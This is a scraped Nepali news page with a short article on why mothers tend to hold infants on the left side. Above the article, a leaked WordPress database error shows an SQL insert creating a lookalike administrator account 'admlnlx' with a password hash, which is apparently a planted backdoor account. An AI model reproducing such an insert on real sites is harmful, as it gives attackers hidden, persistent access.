WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc7V1qYZeAAwS9emq8LcVN1/6.gPaN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 10:54:55', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
आमाले देब्रे छातीमा किन राख्छिन् बच्चा ? – Gaule Khabar

आमाले देब्रे छातीमा किन राख्छिन् बच्चा ?

आमाले देब्रे छातीमा किन राख्छिन् बच्चा ?

माघ,६ –

एजेन्सी– आमाले नवजात शिशुलाई प्रायः छातीको देब्रेतर्फ च्यापेर राखेका हुन्छन् । केही वैज्ञानिकले आमाले छातीको बायाँतर्फ बच्चालाई च्यापेर राख्दाको रहस्य पत्ता लगाएको बताएका छन्।

बायाँ भागमा राख्दा बच्चाको दिमागको दाहिने भाग सक्रिय हुने र यसले आमा तथा बच्चाबीच आत्मीयता बढाउने र बोल्न सहयोग गर्ने वैज्ञानिकहरुको दाबी छ । दायाँ दिमागले स्मरण गर्नेदेखि अन्य महत्पूर्ण काम गर्छ । कसैकसैको बायाँ दिमाग सक्रिय हुन्छ, जस्तैः देब्रे हात चलाउने ।

बच्चालाई बायाँ भागमा राख्ने काम मानिसले मात्र होइन जनावरमा पनि उत्तिकै पाइने रसियाली अनुसन्धानकर्ताले बताएका छन्। यस्तो व्यवहार स्तनधारी प्राणी कंगारु, चमेरोदेखि ह्वेल माछा, घोडा लगायतमा देखिन्छ।

आमाले बच्चालाई देब्रे छातीमा राख्ने प्रक्रिया बाँच्ने कला र सामाजिक सम्बन्धको उदाहरण भएको सेन्ट पिटर्सवर्ग स्टेट युनिभर्सिटीका डा। यगोर मालासिचेभले बताएका छन्। आमा र बच्चाबीच आँखा नजुधे दायाँ दिमाग सक्रिय नहुने उनको भनाइ छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका